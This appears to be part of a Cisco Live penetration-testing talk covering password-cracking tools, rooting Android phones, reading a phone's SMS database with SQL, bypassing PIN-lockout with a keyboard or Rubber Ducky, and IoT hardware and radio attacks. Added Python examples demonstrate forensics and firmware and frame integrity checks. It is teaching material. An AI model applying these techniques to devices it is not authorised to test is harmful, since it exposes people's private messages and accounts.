• Man-in-the-middle
• Attacking encryption
Lots of Password Cracking Tools
• Hashcat - Hash cracking tool
• RainbowCrack - Hash cracker tool, Windows/Linux based
• Wfuzz - Web application brute forcing (GET / POST), (SQL, XSS, LDAP, etc.)
• Cain and Abel - A few password cracking features
• John the Ripper - Offline mode, automatic hash type detection
• THC Hydra - Dictionary attack tool for many databases, over 30 protocols
• AirCrack-NG - WEP and WPA-PSK key cracking
• OphCrack / Medusa / L0phtCrack / etc.
CeWL

Attacking Mobile Devices

Always Research

• Mobile exploitation is constantly changing
• New vulnerabilities are constantly discovered
• Vendors are improving patching
• Attack tools are constantly improving

Attacks are not black and white – TEST!
Phones: Mac OS X

• Jailbreaking, usually older iOS
• Attack iTunes backups
• AnyTrans or iPhone Backup Extractor
• iOS snapshots
Phones: Android

• Older versions – connect as mass storage
• Version 6 or later – encrypted
• Root the device – KingoRoot
• SMS database:
/data/data/com.android.providers.telephony/databases/mmssms.db

• Script to read SMS (date and date_sent are stored in milliseconds, hence the /1000):

SELECT datetime(date/1000, 'unixepoch', 'localtime'),
       datetime(date_sent/1000, 'unixepoch', 'localtime'),
       person, body
FROM sms
WHERE thread_id = 310
ORDER BY date
Example Reading SMS

date                | date_sent           | person | body
--------------------+---------------------+--------+-------------------------------------------------------------
2017-10-20 13:48:18 | 2017-10-20 13:48:16 | 54     | Hello Randy! Where should I send my Cisco live presentation?
2017-10-20 16:34:03 | 2017-01-01 02:00:00 |        | Damn, thanks ! for texting jet
2017-10-20 16:40:02 | 2017-10-20 16:40:01 | 54     | Jet? When you are a Jet, you're a jet? West Side??
                    |                     |        | Stupid auto correct!
                    |                     |        | I'm going to dropkick you Joey ... And this phone
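The deck's query, run from Python against a stand-in for mmssms.db, as an added example that is not part of the original slides. The rows are constructed to match the slide's output; the two refinements over the slide's SQL are a bound thread_id parameter and reporting an unknown date_sent (stored as 0) as None rather than as an epoch-era timestamp.

```python
import sqlite3

# Constructed sample rows modelled on the sms table of Android's mmssms.db:
# date and date_sent are milliseconds since the Unix epoch; 0 means unknown.
SAMPLE_SMS = [
    # (thread_id, date_ms, date_sent_ms, person, body)
    (310, 1508507298000, 1508507296000, 54,
     "Hello Randy! Where should I send my Cisco live presentation?"),
    (310, 1508517243000, 0, None, "Damn, thanks ! for texting jet"),
    (310, 1508517602000, 1508517601000, 54,
     "Jet? When you are a Jet, you're a jet? West Side??"),
    (311, 1508520000000, 1508520000000, 7, "Unrelated thread, must not appear"),
]


def open_sample_db():
    """Build an in-memory stand-in for mmssms.db with the columns the query needs."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sms (_id INTEGER PRIMARY KEY, thread_id INTEGER, "
                 "date INTEGER, date_sent INTEGER, person INTEGER, body TEXT)")
    conn.executemany("INSERT INTO sms (thread_id, date, date_sent, person, body) "
                     "VALUES (?, ?, ?, ?, ?)", SAMPLE_SMS)
    return conn


def read_thread(conn, thread_id, localtime=True):
    """Return (received, sent, person, body) rows for one thread, oldest first.

    localtime=True matches the deck's query; pass False for UTC output, which
    is what a report should record so results do not depend on the analyst's
    time zone.
    """
    tz = ", 'localtime'" if localtime else ""
    sql = (f"SELECT datetime(date/1000, 'unixepoch'{tz}) AS received, "
           f"CASE WHEN date_sent > 0 THEN datetime(date_sent/1000, 'unixepoch'{tz}) END AS sent, "
           "person, body FROM sms WHERE thread_id = ? ORDER BY date")
    return conn.execute(sql, (thread_id,)).fetchall()
```

To read a real pulled database, replace open_sample_db() with sqlite3.connect() on a copy of mmssms.db, never on the original evidence file.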
What is Root for Android?

Requires root access to modify:
  Root directory
  System
  Data

Accessible by default:
  SD CARD
  Downloads
  Pictures

Models You Won't Root
  Google Pixel or Pixel XL (Verizon variant)
  Google Pixel 2 or Pixel 2 XL (Verizon variant)
  Samsung Galaxy S7 (US variants)
  Samsung Galaxy S7 Edge (US variants)
  Samsung Galaxy S8 (US variants)
  Samsung Galaxy S8+ (US variants)
  Samsung Galaxy Note 8 (US variants)
  Samsung Galaxy S9 (US variants)
  Samsung Galaxy S9+ (US variants)
  Samsung Galaxy Note 9 (US variants)

Good Targets
  Google Nexus 6P
  OnePlus 3 or 3T
  OnePlus 5
  OnePlus 6
  Google Nexus 7 (2012 or 2013)
  Google Pixel or Pixel XL
  Google Pixel 2 or Pixel 2 XL
Brute Force PINs

• Most phones lock if brute forced
• TIP: Plugging in a keyboard can bypass this.
• TIP 2: Rubber Ducky abuses keyboard drivers and is an effective brute force tool
Many Commercial Tools Available

• Cellebrite or Elcomsoft are good but pricey!
• Know that even professional tools have limitations!
Accessing Unauthorized Voicemail

Testing IoT

Hacking IoT
(Lightbulbs, conference blinky things, power plugs, cameras)
Hacking IoT

• Micro drive or plug to access hardware
• Firmware security analysis and modification
• Radio- / wireless-based exploitation
• Application exploitation
• Hardware exploitation (example: JTAG)
IoT Recon

• Mobile application downloads
• Web dashboards and resources
• Firmware or source code
• Any available APIs
• Plugs to access hard drive / removable storage
IoT Firmware

Firmware – Code running on the hardware (bootloader, file systems, kernel, etc.)

Many devices don't validate firmware!

Call support for help!
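What "validating firmware" looks like at its most basic, as an added example that is not from the deck or from any vendor's code: the following Python builds a constructed U-Boot legacy uImage and verifies its magic, header CRC, declared size and payload CRC. A CRC only catches accidental corruption; anyone can recompute it after modifying the payload (the test shows a rebuilt image passing), so a device that checks nothing stronger, such as a signature over the image, does not validate firmware in any security sense. The OS/arch/type/comp codes are the U-Boot image.h values as the author recalls them and only label the sample.

```python
import struct
import zlib

IH_MAGIC = 0x27051956                   # U-Boot legacy image magic
HEADER_FMT = ">IIIIIIIBBBB32s"          # big-endian, 64 bytes in total
HEADER_LEN = struct.calcsize(HEADER_FMT)
OS_LINUX, ARCH_ARM, TYPE_KERNEL, COMP_NONE = 5, 2, 2, 0   # image.h codes (assumed)


def build_uimage(data, name, load=0x80008000, entry=0x80008000):
    """Construct a uImage: header (with hcrc over the zeroed-hcrc header) + data."""
    hdr = struct.pack(HEADER_FMT, IH_MAGIC, 0, 0, len(data), load, entry,
                      zlib.crc32(data), OS_LINUX, ARCH_ARM, TYPE_KERNEL,
                      COMP_NONE, name.encode())
    hcrc = zlib.crc32(hdr)
    return hdr[:4] + struct.pack(">I", hcrc) + hdr[8:] + data


def verify_uimage(image):
    """Return (ok, reason_or_name) after checking magic, header CRC, size, data CRC."""
    if len(image) < HEADER_LEN:
        return False, "too short for a uImage header"
    fields = struct.unpack(HEADER_FMT, image[:HEADER_LEN])
    magic, hcrc, _time, size, _load, _entry, dcrc = fields[:7]
    if magic != IH_MAGIC:
        return False, "bad magic"
    zeroed = image[:4] + b"\0\0\0\0" + image[8:HEADER_LEN]   # hcrc field zeroed
    if zlib.crc32(zeroed) != hcrc:
        return False, "header CRC mismatch"
    data = image[HEADER_LEN:HEADER_LEN + size]
    if len(data) != size:
        return False, "truncated payload"
    if zlib.crc32(data) != dcrc:
        return False, "data CRC mismatch"
    return True, fields[11].rstrip(b"\0").decode()


# Constructed sample image; the payload stands in for a kernel blob.
SAMPLE_IMAGE = build_uimage(b"constructed kernel payload " * 8, "constructed-kernel")
```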
IoT Hardware Hacking

• Unauthenticated root is common when tapping into the hardware
• Identify UART or JTAG pins
• Use a multimeter to find ground, transmit and receive
• Connect to an exploitation tool (ATTIFY Badge) and adjust the baud rate until you can read. It's likely to be unauthenticated.
Radio Interfaces

• Software Defined Radio
• ZigBee exploitation
• Bluetooth

Example Attack Methods

• Man-in-the-middle attack
• Replay attack
• Insecure CRC verification
• Clear text
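Three of the attack methods above share one root cause: the receiver cannot tell a legitimate frame from a modified or re-sent one. As an added example (not from the deck), the following Python shows a CRC-only frame check, which any sender can satisfy because no key is involved, beside a keyed check with a monotonic counter that rejects both tampering and replay. The key, frame layout and payloads are constructed; the payload still travels in the clear, so this adds authenticity, not confidentiality.

```python
import hashlib
import hmac
import struct
import zlib

# Constructed shared key for the example; a real deployment needs per-device keys.
KEY = b"constructed-demo-key-not-for-production"
TAG_LEN = 16


def crc_frame(payload):
    """Frame guarded only by CRC32: detects bit errors, not deliberate changes."""
    return payload + struct.pack(">I", zlib.crc32(payload))


def crc_accept(data):
    """Passes for any payload whose CRC was recomputed by the sender: no key."""
    payload, crc = data[:-4], struct.unpack(">I", data[-4:])[0]
    return zlib.crc32(payload) == crc


def auth_frame(counter, payload):
    """Keyed frame: 4-byte counter | payload | truncated HMAC-SHA256 tag."""
    body = struct.pack(">I", counter) + payload
    return body + hmac.new(KEY, body, hashlib.sha256).digest()[:TAG_LEN]


class Receiver:
    """Accepts a frame only if the tag verifies and the counter moves forward."""

    def __init__(self):
        self.last_counter = -1

    def accept(self, data):
        if len(data) < 4 + TAG_LEN:
            return False, "short"
        body, tag = data[:-TAG_LEN], data[-TAG_LEN:]
        expected = hmac.new(KEY, body, hashlib.sha256).digest()[:TAG_LEN]
        if not hmac.compare_digest(tag, expected):    # constant-time comparison
            return False, "bad tag"
        counter = struct.unpack(">I", body[:4])[0]
        if counter <= self.last_counter:               # already seen: replay
            return False, "replay"
        self.last_counter = counter
        return True, body[4:]
```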
Reporting

Language is Everything

• People can be terminated
• Critical vulnerabilities could be overlooked
• Money and time could be wasted
• Choose your tone wisely
• Expect readers with various levels of education
• Include details (tools, time, process)
• Define acronyms
Penetration Testing Report

• Target audience – Who will read it
• Report classification – Could contain sensitive information
• All information collected – Need to list everything (notes, screenshots, etc.)
• Summary of findings
• Summary of recommendations
Penetration Testing Report - Details

• Vulnerabilities – What you found
• Impact – Potential damage
• Likelihood – How hard to execute
• Risk evaluation – Impact to business
• Recommendation – Remediation steps
• References – Who worked on what
• Additional details – Appendices, glossary, tools used, etc.

Example: Offensive Security sample report
https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf
Remember .... Cybersecurity Goals

Confidentiality = Protect sensitive data
Integrity = Ensure no unauthorized modifications
Availability = Authorized people can access it
Wrap up
Threats will increase.
Volume and sophistication.

Next Steps
Security is a Journey, Not a destination

Q&A

Complete Your Online Session Evaluation

• Give us your feedback and receive a complimentary Cisco Live 2019 Power Bank after completing the overall event evaluation and 5 session evaluations.
• All evaluations can be completed via the Cisco Live Melbourne Mobile App.
• Don't forget: Cisco Live sessions will be available for viewing on demand after the event at:
https://ciscolive.cisco.com/on-demand-library/
Thank you
